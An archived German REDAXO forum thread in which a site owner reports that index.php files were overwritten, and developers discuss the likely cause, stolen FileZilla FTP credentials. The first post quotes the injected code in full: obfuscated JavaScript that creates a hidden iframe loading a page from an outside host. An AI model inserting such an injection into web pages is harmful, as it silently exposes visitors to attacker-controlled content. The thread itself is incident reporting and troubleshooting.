Hallo zusammen,
Ich habe einige Redaxo-Installationen laufen. Und bei derzeit 5 Stück ist in den letzten 3 Tagen die index.php Datei überschrieben worden. Es betrifft nur einzelne Provider (vor allen Strato), nicht alle.
Der Schaden ist gering, bisher, es wird folgender Code in die index.php geschrieben, immer am Anfang der Zeile.
*****
nm='de';nl='nts';kl='i';j='tt';jp='7a0';z='hol';s='/s';wr='3fb';ww='7';k='aus';i='79';hs='/in';xj='1';da='ge';no='x.p';v='tp=';lm='ra';zq='7a';hg='a';x='fc';pb='hp?';st='h';q='e';qe='sme';r='p:/';yb='/';ej='om';cr='f';ry='c';g='.c';gc='s';f='r';n='m';ev='1c';vi='e';uh=kl.concat(cr,lm,n,vi);th=gc.concat(f,ry);d=st.concat(j,r,s,k,hg,da,qe,nl,g,ej,yb,z,q,hs,nm,no,pb,v,wr,jp,x,ev,xj,i,zq,ww);var t=document.createElement(uh);t.setAttribute('width','5');t.setAttribute('height','5');t.setAttribute('style','display:none');t.setAttribute(th,d);document.body.appendChild(t);
*****
Dadurch erscheinen Fehlermeldungen auf jeder Seite, und der Code wie oben.
Nach dem Löschen ging fast überall alles wieder reibungslos. (Bei einer Installation hat es mir ImageResize und ein paar andere Dinge zerschossen)
Habt ihr das Probelm auf gerade? Was kann ich tun, um die Lücke zu schließen?
Gruß
Sabine
Hallo,
Wir haben in letzter Zeit festgestellt, dass die Kommunikation via Slack viel schneller und zielführender ist als ein Beitrag im Forum. Aufgrund der neuen und besseren Möglichkeiten der Kommunikation haben wir uns entschlossen das Forum nur noch als Archiv zur Verfügung zu stellen. Somit bleibt es weiterhin möglich hier nach Lösungen zu suchen. Neue Beiträge können nicht mehr erstellt werden.
Wir empfehlen, für deine Fragen/Probleme Slack zu nutzen. Dort sind viele kompetente Benutzer aktiv und beantworten jegliche Fragen, gerne auch von REDAXO-Anfängern! Slack wird von uns sehr intensiv und meistens "rund um die Uhr" benutzt
Selbst einladen kannst Du dich hier: https://redaxo.org/slack/
Wir haben in letzter Zeit festgestellt, dass die Kommunikation via Slack viel schneller und zielführender ist als ein Beitrag im Forum. Aufgrund der neuen und besseren Möglichkeiten der Kommunikation haben wir uns entschlossen das Forum nur noch als Archiv zur Verfügung zu stellen. Somit bleibt es weiterhin möglich hier nach Lösungen zu suchen. Neue Beiträge können nicht mehr erstellt werden.
Wir empfehlen, für deine Fragen/Probleme Slack zu nutzen. Dort sind viele kompetente Benutzer aktiv und beantworten jegliche Fragen, gerne auch von REDAXO-Anfängern! Slack wird von uns sehr intensiv und meistens "rund um die Uhr" benutzt
Selbst einladen kannst Du dich hier: https://redaxo.org/slack/
-
SabineHaupt
- Beiträge: 3
- Registriert: 1. Aug 2011, 10:12
Re: Hackerangriff?
Benutzt du/ihr - bzw. irgendjemand der Zugriff aufs FTP der sites hat - zufällig FileZilla..? Wenn ja, siehe http://www.redaxo.org/de/forum/post93473.html#p93473 Punkt 2.2.SabineHaupt hat geschrieben:.. derzeit 5 Stück ist in den letzten 3 Tagen die index.php Datei überschrieben worden. Es betrifft nur einzelne Provider (vor allen Strato), nicht alle.
...
Nach dem Löschen ging fast überall alles wieder reibungslos. (Bei einer Installation hat es mir ImageResize und ein paar andere Dinge zerschossen)
Habt ihr das Probelm auf gerade? Was kann ich tun, um die Lücke zu schließen?
Wenn nicht: wäre es arg gut, wenn ihr die Server logs mal durchkämmt, bzw. zumindest mal sichert, damit man evtl. nachvollziehen über welchen Weg der Angriff lief..
lg,
Jan
vg, Jan
-
Markus.Staab
- Entwickler
- Beiträge: 9634
- Registriert: 29. Jan 2005, 15:50
- Wohnort: Aschaffenburg/Germany
- Kontaktdaten: ICQ Website
Re: Hackerangriff?
Hi,
außerdem wäre interessant welche Module und Addons Ihr verwendet.
Uns sind aktuell keine Sicherheitslücken in REDAXO bekannt.
Gruß,
Markus
außerdem wäre interessant welche Module und Addons Ihr verwendet.
Uns sind aktuell keine Sicherheitslücken in REDAXO bekannt.
Gruß,
Markus
-
Thomas.Blum
- Entwickler
- Beiträge: 5063
- Registriert: 24. Aug 2004, 22:11
- Wohnort: Dresden
- Kontaktdaten: Website
Re: Hackerangriff?
Hej,
wichtig wäre noch zu wissen welche REDAXO Version du benutzt und welches OS läuft auf den Servern?
Und wie Jan schon schrieb die Logs.
vg Thomas
wichtig wäre noch zu wissen welche REDAXO Version du benutzt und welches OS läuft auf den Servern?
Und wie Jan schon schrieb die Logs.
vg Thomas
-
Ruediger.Nitzsche
- Beiträge: 2117
- Registriert: 13. Dez 2005, 09:29
- Wohnort: Coburg
- Kontaktdaten: Website
Re: Hackerangriff?
REDAXO als Ursache ist relativ sehr sicher auszuschließen, wir haben hier mit mehreren hundert Installationen keinerlei Probleme und darunter befinden sich einige stark frequentierte und indizierte Seiten. Ursache dürfte wie schon angemerkt entweder der Hack über Filezilla und/oder unsichere PHP-Einstellungen sein. Ohne Logfiles wird es aber schwierig exakt die Ursache zu benennen.
Rüdiger
Rüdiger
gn2 netwerk | gn2 hosting | REDAXO Referenzen | Github
Supportanfragen per PN werden gepflegt ignoriert
Supportanfragen per PN werden gepflegt ignoriert
-
SabineHaupt
- Beiträge: 3
- Registriert: 1. Aug 2011, 10:12
Re: Hackerangriff?
Hallo an alle,
erstmal vielen Dank für eure schnellen Antworten.
Ja, ich benutze zum Teil FileZilla. *Asche auf mein Haupt* Das werde ich gleich ändern.
Danke für den Thread zur Unsicherheit: Ich werde auch die SQL-Zugangsdaten ändern.
Ich glaube allerdings nicht so unbedingt, dass es daran liegt, da bisher alle! Installationen auf Strato betroffen hat, sowie einen kleineren Provider, und keinen auf dem Server von Pearl Online, wo ich die meisten gehostet habe. Ich glaub sowieso nicht an zufälle, und an solche garnicht.
Versionen, die betroffen sind: 4.3.0 - 4.2.1 - 4.3.1 - 4.2.0
Ich werde die Installationen updaten.
Ich habe nicht wirklich viele Module und Addons installiert, es sind ganz einfache Installationen.
Hier die Zusammenstellung Addons:
be_search
be_style
agk_skin
image_resize
import_export
jquerylightbox
lightbox
metainfo
phpmailer
smartytemplates
textile
tinymce
url_rewrite
Module:
TinyMCE Wyswyg
Bildgalerie
Terminimport - eine Verknüpfung zu einer Seminarverwaltungsseite, für xml werden Daten importiert
php - Möglichkeit individuellen php Code einzufügen ???? kann hier die Schwachstelle sein????
Youtube - Möglichkeit ein Youtube video einzubinden
Formulargenerator
Allerdings ist ein Hack auch bei einer Installation passiert, die als Modul nur TinyMCE installiert hat.
Ich versuche die Logs zu bekommen, bei einem hab ich die Chance dazu. Und dort werde ich auch die OS Version haben. Sobald ich was weiß, poste ich es wieder hier.
Ich hab auch den Code des Hackeintrags mal in Google gesucht, und es gibt noch unendliche viele Seiten, die das gleiche Problem haben. Aber, ich hab gerade auch eine gefunden, die mit Typo3 erstellt ist. Also, es scheint wirklich nicht Redaxo zu sein.
Ich danke für eure Hilfe. Und vielleicht helfen die Informationen doch irgendjemanden weiter.
Grüße
Sabine
erstmal vielen Dank für eure schnellen Antworten.
Ja, ich benutze zum Teil FileZilla. *Asche auf mein Haupt* Das werde ich gleich ändern.
Danke für den Thread zur Unsicherheit: Ich werde auch die SQL-Zugangsdaten ändern.
Ich glaube allerdings nicht so unbedingt, dass es daran liegt, da bisher alle! Installationen auf Strato betroffen hat, sowie einen kleineren Provider, und keinen auf dem Server von Pearl Online, wo ich die meisten gehostet habe. Ich glaub sowieso nicht an zufälle, und an solche garnicht.
Versionen, die betroffen sind: 4.3.0 - 4.2.1 - 4.3.1 - 4.2.0
Ich werde die Installationen updaten.
Ich habe nicht wirklich viele Module und Addons installiert, es sind ganz einfache Installationen.
Hier die Zusammenstellung Addons:
be_search
be_style
agk_skin
image_resize
import_export
jquerylightbox
lightbox
metainfo
phpmailer
smartytemplates
textile
tinymce
url_rewrite
Module:
TinyMCE Wyswyg
Bildgalerie
Terminimport - eine Verknüpfung zu einer Seminarverwaltungsseite, für xml werden Daten importiert
php - Möglichkeit individuellen php Code einzufügen ???? kann hier die Schwachstelle sein????
Youtube - Möglichkeit ein Youtube video einzubinden
Formulargenerator
Allerdings ist ein Hack auch bei einer Installation passiert, die als Modul nur TinyMCE installiert hat.
Ich versuche die Logs zu bekommen, bei einem hab ich die Chance dazu. Und dort werde ich auch die OS Version haben. Sobald ich was weiß, poste ich es wieder hier.
Ich hab auch den Code des Hackeintrags mal in Google gesucht, und es gibt noch unendliche viele Seiten, die das gleiche Problem haben. Aber, ich hab gerade auch eine gefunden, die mit Typo3 erstellt ist. Also, es scheint wirklich nicht Redaxo zu sein.
Ich danke für eure Hilfe. Und vielleicht helfen die Informationen doch irgendjemanden weiter.
Grüße
Sabine
Re: Hackerangriff?
Womit das Thema geklärt wäre..SabineHaupt hat geschrieben:Ja, ich benutze zum Teil FileZilla.
lg,
Jan
vg, Jan